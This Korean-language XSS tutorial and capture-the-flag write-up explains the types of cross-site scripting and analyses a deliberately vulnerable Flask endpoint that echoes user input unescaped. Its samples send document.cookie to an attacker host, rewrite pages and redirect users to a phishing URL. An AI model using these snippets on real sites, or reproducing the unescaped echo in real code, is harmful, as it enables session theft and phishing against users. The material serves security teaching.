XSS는 클라이언트 사이드 취약점 중 하나로, 공격자가 웹 리소스에 악성 스크립트를 삽입해 이용자의 웹 브라우저에서 해당 스크립트를 실행할 수 있다.
이런 식으로 이용자가 XSS 게시물에 접속하면 공격자가 임의로 삽입한 스크립트가 실행되어 쿠키 및 세션이 탈취될 수 있다.
이 취약점은 SOP 보안 정책이 등장하면서 서로 다른 오리진에서는 정보를 읽는 행위가 이전에 비해 힘들어졌다. 그러나 이를 우회하는 다양한 기술이 소개되면서 XSS 공격은 지속되고 있다.
XSS 발생 예시와 종류
클라이언트는 HTTP 형식으로 웹 서버에 리소스를 요청하고 서버로부터 받은 응답, 즉 HTML, CSS, JS 등의 웹 리소스를 시각화하여 이용자에게 보여준다. 이 때, HTML, CSS, JS와 같은 코드가 포함된 게시물을 조회할 경우 이용자는 변조된 페이지를 보거나 스크립트가 실행될 수 있다.
종류설명
Stored XSS
XSS에 사용되는 악성 스크립트가 서버에 저장되고 서버의 응답에 담겨오는 XSS
Reflected XSS
XSS에 사용되는 악성 스크립트가 URL에 삽입되고 서버의 응답에 담겨오는 XSS
DOM-based XSS
XSS에 사용되는 악성 스크립트가 URL Fragment에 삽입되는 XSS
Universal XSS
클라이언트의 브라우저 혹은 브라우저의 플러그인에서 발생하는 취약점으로 SOP 정책을 우회하는 XSS
XSS 스크립트 예시
자바스크립트는 웹 문서의 동작을 정의하는데, 공격자가 자바스크립트를 통해 이용자에게 보여지는 웹 페이지를 조작하거나, 웹 브라우저의 위치를 임의의 주소로 변경할 수 있다. 다양한 동작을 정의할 수 있기에 XSS 공격에 주로 사용된다. 자바 스크립트를 실행하기 위한 태그로는 script가 있고 코드 예시로 살펴보자.
- 쿠키 및 세션 탈취 공격 코드
// "hello" 문자열 alert 실행.
alert("hello");
// 현재 페이지의 쿠키(return type: string)
document.cookie;
// 현재 페이지의 쿠키를 인자로 가진 alert 실행.
alert(document.cookie);
// 쿠키 생성(key: name, value: test)
document.cookie = "name=test;";
// new Image() 는 이미지를 생성하는 함수이며, src는 이미지의 주소를 지정. 공격자 주소는 <a href=http://hacker.dreamhack.io>http://hacker.dreamhack.io</a>
// "<a href=http://hacker.dreamhack.io/?cookie=현재페이지의쿠키>http://hacker.dreamhack.io/?cookie=현재페이지의쿠키</a>" 주소를 요청하기 때문에 공격자 주소로 현재 페이지의 쿠키 요청함
new Image().src = "<a href=http://hacker.dreamhack.io/?cookie=>http://hacker.dreamhack.io/?cookie=</a>" + document.cookie;
페이지 변조 공격 코드
<script>
// 이용자의 페이지 정보에 접근.
document;
// 이용자의 페이지에 데이터를 삽입.
document.write("Hacked By DreamHack !");
</script>
- 위치 이동 공격 코드
// 이용자의 위치를 변경.
// 피싱 공격 등으로 사용됨.
location.href = "<a href=http://hacker.dreamhack.io/phishing>http://hacker.dreamhack.io/phishing</a>";
// 새 창 열기
window.open("<a href=http://hacker.dreamhack.io/>http://hacker.dreamhack.io/</a>")
Stored XSS
Stored XSS 란 서버의 DB 또는 File 등의 형태로 저장된 악성 스크립트를 조회할 때 발생할 수 있는 XSS다. 대표적으로 게시물과 댓글에 악성 스크립트를 포함해 업로드하는 방법이 있다. 불특정 다수에서 노출될 수 있어 해당 기능에서 XSS 취약점이 존재할 경우 큰 피해를 입을 수 있다.
Reflected XSS
Reflected XSS는 서버가 악성 스크립트가 담긴 요청을 출력할 때 발생한다. 예를 들면, 게시판 서비스에서 작성된 게시물을 조회하는 검색창에서 스크립트를 포함해 검색하는 방법이 있다. 이용자가 검색을 하고, 검색 결과가 이용자에게 반환될 때, 검색 결과를 응답에 포함하는 검색 문자열에 악성 스크립트가 포함되어 있다면 Reflected XSS가 발생할 수 있다. Relfected XSS는 Stored XSS와 다르게, URL과 같은 이용자의 요청에 의해 발생된다. 따라서 이용자가 눈치채지 못하게 악성 스크립트가 포함된 링크에 접속할 수 있도록 주로 Click Jacking 또는 Open Redirect 등 다른 취약점과 연계하여 사용한다.
정리하며
Cross Site Scripting(XSS) : 클라이언트 사이드 취약점, 공격자가 웹 리소스에 악성 스크립트를 삽입하여 이용자의 웹 브라우저에서 해당 스크립트를 실행
Stored XSS: 악성 스크립트가 서버 내에 존재. 이용자가 저장된 악성 스크립트를 조회할 때 발생
Reflected XSS: 악성 스크립트가 이용자 요청 내에 존재. 이용자가 악성 스크립트가 포함된 요청을 보낸 후 응답을 출력할 때 발생.
취약점 분석
vuln과 memo 엔드포인트는 이용자의 입력값을 페이지에 출력한다. memo는 render_templete 함수를 사용해 memo.html을 출력한다. render_template 함수는 전달된 템플릿 변수를 기록할 때 HTML 엔티티코드로 변환해 저장하기 때문에 XSS가 발생하지 않는다. 그러나 vuln은 이용자가 입력한 값을 페이지에 그대로 출력하기 때문에 XSS가 발생한다.
vuln 함수
@app.route("/vuln")
def vuln():
param = request.args.get("param", "") # 이용자가 입력한 vuln 인자를 가져옴
return param # 이용자의 입력값을 화면 상에 표시
익스플로잇
익스플로잇
문제를 해결하기 위해서는 /vuln 엔드포인트에서 발생하는 XSS 취약점을 통해 임의 이용자의 쿠키를 탈취해야 한다. 탈취한 쿠키를 전달받기 위해서는 외부에서 접근 가능한 웹 서버를 사용하거나 문제에서 제공하는 memo 엔드포인트를 사용할 수 있다. 다음은 공격에 사용할 수 있는 속성에 대한 설명이다.
속성설명
location.href
전체 URL을 반환하거나, URL을 업데이트할 수 있는 속성값
document.cookie
해당 페이지에서 사용하는 쿠키를 읽고 쓰는 속성값
쿠키 탈취
임의 이용자의 쿠키를 탈취하기 위한 방법은 다음과 같이 두 가지가 있다.
memo 페이지 사용
flag 엔드포인트에서 다음과 같은 익스플로잇 코드를 입력하면, memo 엔드포인트에서 임의 이용자의 쿠키 정보를 확인할 수 있다.
외부에서 접근 가능한 웹 서버를 통해 탈취한 쿠키를 확인할 수 있다. 외부에서 접근 가능한 웹 서버가 없다면 아래 첨부한 드림핵에서 제공하는 서비스를 사용할 수 있다. 해당 서비스에서 제공하는 Request Bin 기능은 이용자의 접속 기록을 저장하기 때문에 해당 정보를 확인할 수 있다. Request Bin 버튼을 클릭하면 랜덤한 URL이 생성되며, 해당 URL에 접속한 기록을 저장한다.
flag 기능에서 다음과 같은 익스플로잇 코드를 입력하면, 아래와 같이 접속 기록에 포함된 FLAG를 확인할 수 있다.
